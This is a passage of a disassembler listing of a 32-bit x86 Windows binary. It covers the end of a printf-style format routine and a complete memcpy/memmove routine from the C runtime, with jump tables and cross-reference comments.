lea esi, [ebp+1F8h+var_22C]
call sub_406936
mov al, [ebx]
inc ebx
test al, al
mov [ebp+1F8h+var_240], ebx
jz loc_40730D
loc_406D4B: ; CODE XREF: sub_4069D7+359�j
mov ecx, [ebp+1F8h+var_228]
lea esi, [ebp+1F8h+var_22C]
call sub_406936
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406D5B: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: J8@F_7_S:off_40734F�o
movsx eax, dl ; jumptable 00406B79 case 7
cmp eax, 64h
jg loc_406ED9
jz loc_406F58
cmp eax, 53h
jg loc_406E21
jz short loc_406DD2
sub eax, 41h
jz short loc_406D8D
dec eax
dec eax
jz short loc_406DC1
dec eax
dec eax
jz short loc_406D8D
dec eax
dec eax
jnz loc_4071DC
loc_406D8D: ; CODE XREF: sub_4069D7+3A4�j
; sub_4069D7+3AC�j
add dl, 20h
mov [ebp+1F8h+var_270], 1
mov [ebp+1F8h+var_211], dl
loc_406D9A: ; CODE XREF: sub_4069D7+459�j
; sub_4069D7+51D�j
or [ebp+1F8h+var_210], 40h
cmp [ebp+1F8h+var_218], esi
lea ebx, [ebp+1F8h+var_20C]
mov eax, 200h
mov [ebp+1F8h+var_21C], ebx
mov [ebp+1F8h+var_260], eax
jge loc_406F7C
mov [ebp+1F8h+var_218], 6
jmp loc_406FCA
; ---------------------------------------------------------------------------
loc_406DC1: ; CODE XREF: sub_4069D7+3A8�j
test word ptr [ebp+1F8h+var_210], 830h
jnz short loc_406E3E
or [ebp+1F8h+var_210], 800h
jmp short loc_406E3E
; ---------------------------------------------------------------------------
loc_406DD2: ; CODE XREF: sub_4069D7+39F�j
test word ptr [ebp+1F8h+var_210], 830h
jnz short loc_406DE1
or [ebp+1F8h+var_210], 800h
loc_406DE1: ; CODE XREF: sub_4069D7+401�j
; sub_4069D7+694�j
mov ecx, [ebp+1F8h+var_218]
cmp ecx, 0FFFFFFFFh
jnz short loc_406DEE
mov ecx, 7FFFFFFFh
loc_406DEE: ; CODE XREF: sub_4069D7+410�j
add edi, 4
test word ptr [ebp+1F8h+var_210], 810h
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
mov [ebp+1F8h+var_21C], edi
jz loc_4071BA
cmp edi, esi
jnz short loc_406E12
mov eax, ds:off_423928
mov [ebp+1F8h+var_21C], eax
loc_406E12: ; CODE XREF: sub_4069D7+431�j
mov eax, [ebp+1F8h+var_21C]
mov [ebp+1F8h+var_23C], 1
jmp loc_4071AF
; ---------------------------------------------------------------------------
loc_406E21: ; CODE XREF: sub_4069D7+399�j
sub eax, 58h
jz loc_407063
dec eax
dec eax
jz short loc_406E8B
sub eax, ecx
jz loc_406D9A
dec eax
dec eax
jnz loc_4071DC
loc_406E3E: ; CODE XREF: sub_4069D7+3F0�j
; sub_4069D7+3F9�j
add edi, 4
test word ptr [ebp+1F8h+var_210], 810h
mov [ebp+1F8h+var_224], edi
jz short loc_406E73
movzx eax, word ptr [edi-4]
push eax
push 200h
lea eax, [ebp+1F8h+var_20C]
push eax
lea eax, [ebp+1F8h+var_220]
push eax
call sub_40D732
add esp, 10h
test eax, eax
jz short loc_406E80
mov [ebp+1F8h+var_248], 1
jmp short loc_406E80
; ---------------------------------------------------------------------------
loc_406E73: ; CODE XREF: sub_4069D7+473�j
mov al, [edi-4]
mov [ebp+1F8h+var_20C], al
mov [ebp+1F8h+var_220], 1
loc_406E80: ; CODE XREF: sub_4069D7+491�j
; sub_4069D7+49A�j
lea eax, [ebp+1F8h+var_20C]
mov [ebp+1F8h+var_21C], eax
jmp loc_4071DC
; ---------------------------------------------------------------------------
loc_406E8B: ; CODE XREF: sub_4069D7+455�j
mov eax, [edi]
add edi, 4
cmp eax, esi
mov [ebp+1F8h+var_224], edi
jz short loc_406EC5
mov ecx, [eax+4]
cmp ecx, esi
jz short loc_406EC5
test word ptr [ebp+1F8h+var_210], 800h
movsx eax, word ptr [eax]
mov [ebp+1F8h+var_21C], ecx
jz short loc_406EBD
cdq
sub eax, edx
sar eax, 1
mov [ebp+1F8h+var_23C], 1
jmp loc_4071D9
; ---------------------------------------------------------------------------
loc_406EBD: ; CODE XREF: sub_4069D7+4D3�j
mov [ebp+1F8h+var_23C], esi
jmp loc_4071D9
; ---------------------------------------------------------------------------
loc_406EC5: ; CODE XREF: sub_4069D7+4BE�j
; sub_4069D7+4C5�j
mov eax, ds:off_423924
mov [ebp+1F8h+var_21C], eax
push eax
loc_406ECE: ; CODE XREF: sub_4069D7+680�j
call sub_404130
pop ecx
jmp loc_4071D9
; ---------------------------------------------------------------------------
loc_406ED9: ; CODE XREF: sub_4069D7+38A�j
cmp eax, 70h
jg loc_407068
jz loc_40705C
cmp eax, 65h
jl loc_4071DC
cmp eax, 67h
jle loc_406D9A
cmp eax, 69h
jz short loc_406F58
cmp eax, 6Eh
jz short loc_406F23
cmp eax, 6Fh
jnz loc_4071DC
test byte ptr [ebp+1F8h+var_210], 80h
mov [ebp+1F8h+var_220], 8
jz short loc_406F63
or [ebp+1F8h+var_210], 200h
jmp short loc_406F63
; ---------------------------------------------------------------------------
loc_406F23: ; CODE XREF: sub_4069D7+52B�j
mov esi, [edi]
add edi, 4
mov [ebp+1F8h+var_224], edi
call sub_40D5BD
test eax, eax
jz loc_40730D
test byte ptr [ebp+1F8h+var_210], 20h
jz short loc_406F47
mov ax, word ptr [ebp+1F8h+var_22C]
mov [esi], ax
jmp short loc_406F4C
; ---------------------------------------------------------------------------
loc_406F47: ; CODE XREF: sub_4069D7+565�j
mov eax, [ebp+1F8h+var_22C]
mov [esi], eax
loc_406F4C: ; CODE XREF: sub_4069D7+56E�j
mov [ebp+1F8h+var_248], 1
jmp loc_4072E1
; ---------------------------------------------------------------------------
loc_406F58: ; CODE XREF: sub_4069D7+390�j
; sub_4069D7+526�j
or [ebp+1F8h+var_210], 40h
loc_406F5C: ; CODE XREF: sub_4069D7+69C�j
mov [ebp+1F8h+var_220], 0Ah
loc_406F63: ; CODE XREF: sub_4069D7+541�j
; sub_4069D7+54A�j ...
mov ecx, [ebp+1F8h+var_210]
test cx, cx
jns loc_4070B2
loc_406F6F: ; CODE XREF: sub_4069D7+6E0�j
mov eax, [edi]
mov edx, [edi+4]
add edi, 8
jmp loc_4070E7
; ---------------------------------------------------------------------------
loc_406F7C: ; CODE XREF: sub_4069D7+3D8�j
jnz short loc_406F8C
cmp dl, 67h
jnz short loc_406FCA
mov [ebp+1F8h+var_218], 1
jmp short loc_406FCA
; ---------------------------------------------------------------------------
loc_406F8C: ; CODE XREF: sub_4069D7:loc_406F7C�j
cmp [ebp+1F8h+var_218], eax
jle short loc_406F94
mov [ebp+1F8h+var_218], eax
loc_406F94: ; CODE XREF: sub_4069D7+5B8�j
cmp [ebp+1F8h+var_218], 0A3h
jle short loc_406FCA
mov esi, [ebp+1F8h+var_218]
add esi, 15Dh
push esi
call sub_40773A
test eax, eax
mov dl, [ebp+1F8h+var_211]
pop ecx
mov [ebp+1F8h+var_24C], eax
jz short loc_406FC1
mov [ebp+1F8h+var_21C], eax
mov [ebp+1F8h+var_260], esi
mov ebx, eax
jmp short loc_406FC8
; ---------------------------------------------------------------------------
loc_406FC1: ; CODE XREF: sub_4069D7+5DE�j
mov [ebp+1F8h+var_218], 0A3h
loc_406FC8: ; CODE XREF: sub_4069D7+5E8�j
xor esi, esi
loc_406FCA: ; CODE XREF: sub_4069D7+3E5�j
; sub_4069D7+5AA�j ...
mov eax, [edi]
add edi, 8
mov [ebp+1F8h+var_278], eax
mov eax, [edi-4]
mov [ebp+1F8h+var_274], eax
lea eax, [ebp+1F8h+var_25C]
push eax
push [ebp+1F8h+var_270]
movsx eax, dl
push [ebp+1F8h+var_218]
mov [ebp+1F8h+var_224], edi
push eax
push [ebp+1F8h+var_260]
lea eax, [ebp+1F8h+var_278]
push ebx
push eax
push ds:off_423F98
call sub_405193
pop ecx
call eax
mov edi, [ebp+1F8h+var_210]
add esp, 1Ch
and edi, 80h
jz short loc_407027
cmp [ebp+1F8h+var_218], esi
jnz short loc_407027
lea eax, [ebp+1F8h+var_25C]
push eax
push ebx
push ds:off_423FA4
call sub_405193
pop ecx
call eax
pop ecx
pop ecx
loc_407027: ; CODE XREF: sub_4069D7+634�j
; sub_4069D7+639�j
cmp [ebp+1F8h+var_211], 67h
jnz short loc_407046
cmp edi, esi
jnz short loc_407046
lea eax, [ebp+1F8h+var_25C]
push eax
push ebx
push ds:off_423FA0
call sub_405193
pop ecx
call eax
pop ecx
pop ecx
loc_407046: ; CODE XREF: sub_4069D7+654�j
; sub_4069D7+658�j
cmp byte ptr [ebx], 2Dh
jnz short loc_407056
or [ebp+1F8h+var_210], 100h
inc ebx
mov [ebp+1F8h+var_21C], ebx
loc_407056: ; CODE XREF: sub_4069D7+672�j
push ebx
jmp loc_406ECE
; ---------------------------------------------------------------------------
loc_40705C: ; CODE XREF: sub_4069D7+50B�j
mov [ebp+1F8h+var_218], 8
loc_407063: ; CODE XREF: sub_4069D7+44D�j
mov [ebp+1F8h+var_244], ecx
jmp short loc_407089
; ---------------------------------------------------------------------------
loc_407068: ; CODE XREF: sub_4069D7+505�j
sub eax, 73h
jz loc_406DE1
dec eax
dec eax
jz loc_406F5C
sub eax, 3
jnz loc_4071DC
mov [ebp+1F8h+var_244], 27h
loc_407089: ; CODE XREF: sub_4069D7+68F�j
test byte ptr [ebp+1F8h+var_210], 80h
mov [ebp+1F8h+var_220], 10h
jz loc_406F63
mov al, byte ptr [ebp+1F8h+var_244]
add al, 51h
mov [ebp+1F8h+var_230], 30h
mov [ebp+1F8h+var_22F], al
mov [ebp+1F8h+var_234], 2
jmp loc_406F63
; ---------------------------------------------------------------------------
loc_4070B2: ; CODE XREF: sub_4069D7+592�j
test cx, 1000h
jnz loc_406F6F
add edi, 4
test cl, 20h
jz short loc_4070DA
test cl, 40h
mov [ebp+1F8h+var_224], edi
jz short loc_4070D3
movsx eax, word ptr [edi-4]
jmp short loc_4070D7
; ---------------------------------------------------------------------------
loc_4070D3: ; CODE XREF: sub_4069D7+6F4�j
movzx eax, word ptr [edi-4]
loc_4070D7: ; CODE XREF: sub_4069D7+6FA�j
cdq
jmp short loc_4070EA
; ---------------------------------------------------------------------------
loc_4070DA: ; CODE XREF: sub_4069D7+6EC�j
test cl, 40h
mov eax, [edi-4]
jz short loc_4070E5
cdq
jmp short loc_4070E7
; ---------------------------------------------------------------------------
loc_4070E5: ; CODE XREF: sub_4069D7+709�j
xor edx, edx
loc_4070E7: ; CODE XREF: sub_4069D7+5A0�j
; sub_4069D7+70C�j
mov [ebp+1F8h+var_224], edi
loc_4070EA: ; CODE XREF: sub_4069D7+701�j
test cl, 40h
jz short loc_407107
cmp edx, esi
jg short loc_407107
jl short loc_4070F9
cmp eax, esi
jnb short loc_407107
loc_4070F9: ; CODE XREF: sub_4069D7+71C�j
neg eax
adc edx, 0
neg edx
or [ebp+1F8h+var_210], 100h
loc_407107: ; CODE XREF: sub_4069D7+716�j
; sub_4069D7+71A�j ...
test word ptr [ebp+1F8h+var_210], 9000h
mov ebx, edx
mov edi, eax
jnz short loc_407115
xor ebx, ebx
loc_407115: ; CODE XREF: sub_4069D7+73A�j
cmp [ebp+1F8h+var_218], 0
jge short loc_407124
mov [ebp+1F8h+var_218], 1
jmp short loc_407135
; ---------------------------------------------------------------------------
loc_407124: ; CODE XREF: sub_4069D7+742�j
and [ebp+1F8h+var_210], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+1F8h+var_218], eax
jle short loc_407135
mov [ebp+1F8h+var_218], eax
loc_407135: ; CODE XREF: sub_4069D7+74B�j
; sub_4069D7+759�j
mov eax, edi
or eax, ebx
jnz short loc_40713F
and [ebp+1F8h+var_234], 0
loc_40713F: ; CODE XREF: sub_4069D7+762�j
lea esi, [ebp+1F8h+var_D]
loc_407145: ; CODE XREF: sub_4069D7+7A0�j
mov eax, [ebp+1F8h+var_218]
dec [ebp+1F8h+var_218]
test eax, eax
jg short loc_407155
mov eax, edi
or eax, ebx
jz short loc_407179
loc_407155: ; CODE XREF: sub_4069D7+776�j
mov eax, [ebp+1F8h+var_220]
cdq
push edx
push eax
push ebx
push edi
call sub_40D750
add ecx, 30h
cmp ecx, 39h
mov [ebp+1F8h+var_260], ebx
mov edi, eax
mov ebx, edx
jle short loc_407174
add ecx, [ebp+1F8h+var_244]
loc_407174: ; CODE XREF: sub_4069D7+798�j
mov [esi], cl
dec esi
jmp short loc_407145
; ---------------------------------------------------------------------------
loc_407179: ; CODE XREF: sub_4069D7+77C�j
lea eax, [ebp+1F8h+var_D]
sub eax, esi
inc esi
test word ptr [ebp+1F8h+var_210], 200h
mov [ebp+1F8h+var_220], eax
mov [ebp+1F8h+var_21C], esi
jz short loc_4071DC
test eax, eax
jz short loc_40719B
mov ecx, esi
cmp byte ptr [ecx], 30h
jz short loc_4071DC
loc_40719B: ; CODE XREF: sub_4069D7+7BB�j
dec [ebp+1F8h+var_21C]
mov ecx, [ebp+1F8h+var_21C]
mov byte ptr [ecx], 30h
inc eax
jmp short loc_4071D9
; ---------------------------------------------------------------------------
loc_4071A7: ; CODE XREF: sub_4069D7+7DA�j
dec ecx
cmp [eax], si
jz short loc_4071B3
inc eax
inc eax
loc_4071AF: ; CODE XREF: sub_4069D7+445�j
cmp ecx, esi
jnz short loc_4071A7
loc_4071B3: ; CODE XREF: sub_4069D7+7D4�j
sub eax, [ebp+1F8h+var_21C]
sar eax, 1
jmp short loc_4071D9
; ---------------------------------------------------------------------------
loc_4071BA: ; CODE XREF: sub_4069D7+429�j
cmp edi, esi
jnz short loc_4071C6
mov eax, ds:off_423924
mov [ebp+1F8h+var_21C], eax
loc_4071C6: ; CODE XREF: sub_4069D7+7E5�j
mov eax, [ebp+1F8h+var_21C]
jmp short loc_4071D2
; ---------------------------------------------------------------------------
loc_4071CB: ; CODE XREF: sub_4069D7+7FD�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_4071D6
inc eax
loc_4071D2: ; CODE XREF: sub_4069D7+7F2�j
cmp ecx, esi
jnz short loc_4071CB
loc_4071D6: ; CODE XREF: sub_4069D7+7F8�j
sub eax, [ebp+1F8h+var_21C]
loc_4071D9: ; CODE XREF: sub_4069D7+4E1�j
; sub_4069D7+4E9�j ...
mov [ebp+1F8h+var_220], eax
loc_4071DC: ; CODE XREF: sub_4069D7+3B0�j
; sub_4069D7+461�j ...
cmp [ebp+1F8h+var_248], 0
jnz loc_4072E1
mov eax, [ebp+1F8h+var_210]
test al, 40h
jz short loc_407212
test ax, 100h
jz short loc_4071F9
mov [ebp+1F8h+var_230], 2Dh
jmp short loc_40720B
; ---------------------------------------------------------------------------
loc_4071F9: ; CODE XREF: sub_4069D7+81A�j
test al, 1
jz short loc_407203
mov [ebp+1F8h+var_230], 2Bh
jmp short loc_40720B
; ---------------------------------------------------------------------------
loc_407203: ; CODE XREF: sub_4069D7+824�j
test al, 2
jz short loc_407212
mov [ebp+1F8h+var_230], 20h
loc_40720B: ; CODE XREF: sub_4069D7+820�j
; sub_4069D7+82A�j
mov [ebp+1F8h+var_234], 1
loc_407212: ; CODE XREF: sub_4069D7+814�j
; sub_4069D7+82E�j
mov ebx, [ebp+1F8h+var_238]
sub ebx, [ebp+1F8h+var_220]
sub ebx, [ebp+1F8h+var_234]
test byte ptr [ebp+1F8h+var_210], 0Ch
jnz short loc_407232
push [ebp+1F8h+var_228]
lea eax, [ebp+1F8h+var_22C]
push ebx
push 20h
call sub_406969
add esp, 0Ch
loc_407232: ; CODE XREF: sub_4069D7+848�j
push [ebp+1F8h+var_234]
mov edi, [ebp+1F8h+var_228]
lea eax, [ebp+1F8h+var_22C]
lea ecx, [ebp+1F8h+var_230]
call sub_40698D
test byte ptr [ebp+1F8h+var_210], 8
pop ecx
jz short loc_40725F
test byte ptr [ebp+1F8h+var_210], 4
jnz short loc_40725F
push edi
push ebx
push 30h
lea eax, [ebp+1F8h+var_22C]
call sub_406969
add esp, 0Ch
loc_40725F: ; CODE XREF: sub_4069D7+871�j
; sub_4069D7+877�j
cmp [ebp+1F8h+var_23C], 0
mov eax, [ebp+1F8h+var_220]
jz short loc_4072B9
test eax, eax
jle short loc_4072B9
mov esi, [ebp+1F8h+var_21C]
mov [ebp+1F8h+var_260], eax
loc_407272: ; CODE XREF: sub_4069D7+8D8�j
movzx eax, word ptr [esi]
dec [ebp+1F8h+var_260]
push eax
push 6
lea eax, [ebp+1F8h+var_C]
push eax
lea eax, [ebp+1F8h+var_268]
inc esi
push eax
inc esi
call sub_40D732
add esp, 10h
test eax, eax
jnz short loc_4072B3
cmp [ebp+1F8h+var_268], eax
jz short loc_4072B3
push [ebp+1F8h+var_268]
lea eax, [ebp+1F8h+var_22C]
lea ecx, [ebp+1F8h+var_C]
call sub_40698D
cmp [ebp+1F8h+var_260], 0
pop ecx
jnz short loc_407272
jmp short loc_4072C6
; ---------------------------------------------------------------------------
loc_4072B3: ; CODE XREF: sub_4069D7+8BB�j
; sub_4069D7+8C0�j
or [ebp+1F8h+var_22C], 0FFFFFFFFh
jmp short loc_4072C6
; ---------------------------------------------------------------------------
loc_4072B9: ; CODE XREF: sub_4069D7+88F�j
; sub_4069D7+893�j
mov ecx, [ebp+1F8h+var_21C]
push eax
lea eax, [ebp+1F8h+var_22C]
call sub_40698D
pop ecx
loc_4072C6: ; CODE XREF: sub_4069D7+8DA�j
; sub_4069D7+8E0�j
cmp [ebp+1F8h+var_22C], 0
jl short loc_4072E1
test byte ptr [ebp+1F8h+var_210], 4
jz short loc_4072E1
push edi
push ebx
push 20h
lea eax, [ebp+1F8h+var_22C]
call sub_406969
add esp, 0Ch
loc_4072E1: ; CODE XREF: sub_4069D7+57C�j
; sub_4069D7+809�j ...
cmp [ebp+1F8h+var_24C], 0
jz short loc_4072F4 ; default
push [ebp+1F8h+var_24C]
call sub_403603
and [ebp+1F8h+var_24C], 0
pop ecx
loc_4072F4: ; CODE XREF: sub_4069D7+19C�j
; sub_4069D7+1BF�j ...
mov ebx, [ebp+1F8h+var_240] ; default
mov al, [ebx]
test al, al
mov [ebp+1F8h+var_211], al
jz short loc_407324
mov ecx, [ebp+1F8h+var_26C]
mov edi, [ebp+1F8h+var_224]
mov dl, al
jmp loc_406B35
; ---------------------------------------------------------------------------
loc_40730D: ; CODE XREF: sub_4069D7+36E�j
; sub_4069D7+55B�j
call sub_4057D3
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
jmp loc_406A47
; ---------------------------------------------------------------------------
loc_407324: ; CODE XREF: sub_4069D7+158�j
; sub_4069D7+166�j ...
cmp [ebp+1F8h+var_250], 0
jz short loc_407331
mov eax, [ebp+1F8h+var_254]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_407331: ; CODE XREF: sub_4069D7+951�j
mov eax, [ebp+1F8h+var_22C]
loc_407334: ; CODE XREF: sub_4069D7+88�j
mov ecx, [ebp+1F8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 1F8h
leave
retn
sub_4069D7 endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
off_40734F dd offset loc_406D19 ; DATA XREF: sub_4069D7+1A2�r
dd offset loc_406B80 ; jump table for switch statement
dd offset loc_406B9B
dd offset loc_406BEA
dd offset loc_406C24
dd offset loc_406C2C
dd offset loc_406C63
dd offset loc_406D5B
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407370 proc near ; CODE XREF: sub_402BA0+4D�p
; sub_405B50+2DA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_407390
cmp edi, eax
jb loc_407534
loc_407390: ; CODE XREF: sub_407370+16�j
cmp ecx, 100h
jb short loc_4073B7
cmp ds:dword_433C7C, 0
jz short loc_4073B7
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_4073B7
pop esi
pop edi
pop ebp
jmp sub_40D86C
; ---------------------------------------------------------------------------
loc_4073B7: ; CODE XREF: sub_407370+26�j
; sub_407370+2F�j ...
test edi, 3
jnz short loc_4073D4
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4073D4: ; CODE XREF: sub_407370+4D�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4073EC
and eax, 3
add ecx, eax
jmp dword ptr loc_4073F4+4[eax*4]
; ---------------------------------------------------------------------------
loc_4073EC: ; CODE XREF: sub_407370+6E�j
jmp dword ptr loc_4074F4[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4073F4: ; CODE XREF: sub_407370+58�j
; sub_407370+B6�j ...
jmp off_407478[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407408
dd offset loc_407434
dd offset loc_407458
; ---------------------------------------------------------------------------
loc_407408: ; DATA XREF: sub_407370+8C�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407434: ; DATA XREF: sub_407370+90�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407458: ; DATA XREF: sub_407370+94�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407478 dd offset loc_4074DB ; DATA XREF: sub_407370:loc_4073F4�r
dd offset loc_4074C8
dd offset loc_4074C0
dd offset loc_4074B8
dd offset loc_4074B0
dd offset loc_4074A8
dd offset loc_4074A0
dd offset loc_407498
; ---------------------------------------------------------------------------
loc_407498: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+124�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4074A0: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+120�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4074A8: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+11C�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4074B0: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+118�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4074B8: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+114�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4074C0: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+110�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4074C8: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+10C�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4074DB: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370:off_407478�o
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4074E4 dd offset loc_4074F4 ; DATA XREF: sub_407370+5C�r
; sub_407370+BA�r ...
dd offset loc_4074FC
dd offset loc_407508
dd offset loc_40751C
; ---------------------------------------------------------------------------
loc_4074F4: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4074FC: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407508: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40751C: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407534: ; CODE XREF: sub_407370+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_407568
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40755C
std
rep movsd
cld
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40755C: ; CODE XREF: sub_407370+1DD�j
; sub_407370+238�j ...
neg ecx
jmp off_407630[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407568: ; CODE XREF: sub_407370+1D2�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_407580
and eax, 3
sub ecx, eax
jmp dword ptr loc_407580+4[eax*4]
; ---------------------------------------------------------------------------
loc_407580: ; CODE XREF: sub_407370+202�j
; DATA XREF: sub_407370+209�r
jmp off_407680[ecx*4]
; ---------------------------------------------------------------------------
align 4
xchg eax, esp
jnz short loc_4075CB
add [eax-1FFFBF8Bh], bh
jnz short near ptr loc_4075D1+2
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_40755C
std
rep movsd
cld
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 4
dd 2303468Ah, 34788D1h, 0C102468Ah, 478802E9h
db 2, 83h, 0EEh
; ---------------------------------------------------------------------------
loc_4075CB: ; CODE XREF: sub_407370+219�j
add al, [ebx-67CFD11h]
loc_4075D1: ; CODE XREF: sub_407370+221�j
or [edx-78h], dh
std
rep movsd
cld
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_40755C
std
rep movsd
cld
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407634
dd offset loc_40763C
dd offset loc_407644
dd offset loc_40764C
dd offset loc_407654
dd offset loc_40765C
dd offset loc_407664
off_407630 dd offset loc_407677 ; DATA XREF: sub_407370+1EE�r
; ---------------------------------------------------------------------------
loc_407634: ; DATA XREF: sub_407370+2A4�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40763C: ; DATA XREF: sub_407370+2A8�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_407644: ; DATA XREF: sub_407370+2AC�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40764C: ; DATA XREF: sub_407370+2B0�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_407654: ; DATA XREF: sub_407370+2B4�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40765C: ; DATA XREF: sub_407370+2B8�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_407664: ; DATA XREF: sub_407370+2BC�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407677: ; CODE XREF: sub_407370+1EE�j
; DATA XREF: sub_407370:off_407630�o
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_407680 dd offset loc_407690 ; DATA XREF: sub_407370+1E3�r
; sub_407370:loc_407580�r ...
dd offset loc_407698
dd offset loc_4076A8
dd offset loc_4076BC
; ---------------------------------------------------------------------------
loc_407690: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407698: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4076A8: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4076BC: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_407370 endp
; =============== S U B R O U T I N E =======================================
sub_4076D5 proc near ; CODE XREF: sub_402C0C+31�p
; sub_402C72+3D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
